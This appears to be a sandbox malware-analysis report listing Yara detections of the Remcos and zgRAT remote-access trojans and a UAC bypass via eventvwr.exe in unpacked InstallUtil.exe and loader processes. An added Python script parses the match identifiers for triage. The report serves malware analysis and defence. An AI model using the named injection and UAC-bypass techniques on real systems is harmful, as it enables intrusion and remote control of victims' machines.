Source: Yara match File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR
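The identifiers in the list above encode where each Yara hit was taken: `17.0.InstallUtil.exe.400000.5.raw.unpack` is process index 17, stage 0, image InstallUtil.exe, an unpacked PE at base 0x400000, dump index 5, raw (unmapped) layout; the `.sdmp` names are eight dotted hex fields followed by `.sdmp`. The following parser is an added example for triaging such a list, not tooling from the sandbox vendor. It treats the `.sdmp` field layout (process index, stage, dump id, base address, page protection, an unspecified field, allocation type, an unspecified field) as an assumption inferred from the identifiers on this page; the protection and allocation-type values are decoded with the standard winnt.h constants (0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE, 0x40000 = MEM_MAPPED), and the stage digit is carried through unchanged because this page does not say which capture point each value denotes. The sample lines are copied from this report. Run on them, the summary shows that the InstallUtil.exe hits come from RWX private memory at 0x400000 while the kyFBQxVbsg.exe hits come from read-write heap or mapped regions, which is consistent with the report's "inject code into remote processes" signature: the loader holds the payload, the .NET utility hosts it. The parser also accepts the `Matched rule ... Author ...` form used in the System Summary section.

```python
"""Parse and triage Joe Sandbox 'Yara match' source identifiers.

Added example for this report, not the sandbox's own code. The .sdmp field
layout below is an ASSUMPTION inferred from the identifiers in the report;
the protection/allocation constants are the winnt.h values.
"""
import re
from collections import defaultdict

# winnt.h memory protection and allocation-type constants.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# <proc-idx>.<stage>.<image>.<hex base>.<dump-idx>[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<addr>[0-9a-f]+)"
    r"\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$")
# Eight dotted hex fields then .sdmp. ASSUMED layout: proc-idx, stage, dump id,
# base address, page protection, (unspecified), allocation type, (unspecified).
SDMP_RE = re.compile(r"^(?P<fields>(?:[0-9A-Fa-f]+\.){8})sdmp$")
MEMSTR_RE = re.compile(r"^Process Memory Space:\s*(?P<image>\S+)\s+PID:\s*(?P<pid>\d+)$")
# One report line, with or without the 'Matched rule ... Author ...' suffix.
LINE_RE = re.compile(
    r"^Source:\s*(?:Yara match File source:\s*)?(?P<src>.+?),\s*type:\s*(?P<type>\w+)"
    r"(?:\s*Matched rule:\s*(?P<rule>.+?)\s*Author:\s*(?P<author>.+))?$")

# Constructed sample: lines copied verbatim from this report.
SAMPLE_LINES = [
    "Source: Yara match File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR",
    "Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown",
    "Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen",
    "Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen",
]


def parse_source(src):
    """Decode one source identifier; 'kind' is unpack, sdmp, memstr or unknown."""
    m = UNPACK_RE.match(src)
    if m:
        return {"kind": "unpack", "proc": int(m["proc"]), "stage": int(m["stage"]),
                "image": m["image"], "addr": int(m["addr"], 16),
                "idx": int(m["idx"]), "raw": m["raw"] is not None}
    m = SDMP_RE.match(src)
    if m:
        f = [int(x, 16) for x in m["fields"].rstrip(".").split(".")]
        return {"kind": "sdmp", "proc": f[0], "stage": f[1], "addr": f[3],
                "protect": PAGE_PROTECT.get(f[4], hex(f[4])),
                "memtype": MEM_TYPE.get(f[6], hex(f[6]))}
    m = MEMSTR_RE.match(src)
    if m:
        return {"kind": "memstr", "image": m["image"], "pid": int(m["pid"])}
    return {"kind": "unknown", "src": src}


def triage(report_lines):
    """Group hits by process index; note RWX private regions and string-level PIDs.

    Returns (procs, memstr): procs maps index -> {image, stages, rules,
    rwx_private_at}; memstr maps image name -> set of PIDs with MEMORYSTR hits.
    """
    procs = defaultdict(lambda: {"image": None, "stages": set(), "rules": set(),
                                 "rwx_private_at": set()})
    memstr = defaultdict(set)
    for line in report_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        info = parse_source(m["src"])
        if info["kind"] == "memstr":
            memstr[info["image"]].add(info["pid"])
            continue
        if info["kind"] == "unknown":
            continue
        p = procs[info["proc"]]
        p["stages"].add(info["stage"])
        if m["rule"]:
            p["rules"].add(m["rule"])
        if info["kind"] == "unpack":
            p["image"] = info["image"]
        elif info["protect"] == "PAGE_EXECUTE_READWRITE" and info["memtype"] == "MEM_PRIVATE":
            p["rwx_private_at"].add(info["addr"])
    return dict(procs), dict(memstr)


def hollowed_candidates(procs):
    """Process indexes whose hits include RWX private memory (injected-payload hosts)."""
    return sorted(i for i, p in procs.items() if p["rwx_private_at"])


if __name__ == "__main__":
    procs, memstr = triage(SAMPLE_LINES)
    for idx in sorted(procs):
        p = procs[idx]
        rwx = ", ".join(hex(a) for a in sorted(p["rwx_private_at"])) or "-"
        print(f"proc {idx:>2} {p['image'] or '?':<16} stages={sorted(p['stages'])} "
              f"rwx_private_at={rwx} rules={sorted(p['rules'])}")
    print("MEMORYSTR PIDs:", {k: sorted(v) for k, v in memstr.items()})
    print("RWX private hosts:", hollowed_candidates(procs))
```

Feed it the whole match list (e.g. the lines of this report saved to a file) to get one row per process index instead of several hundred source lines; the `rwx_private_at` column is the quickest way to separate the process that was written into from the processes that merely carried the payload in a buffer.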

System Summary

Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
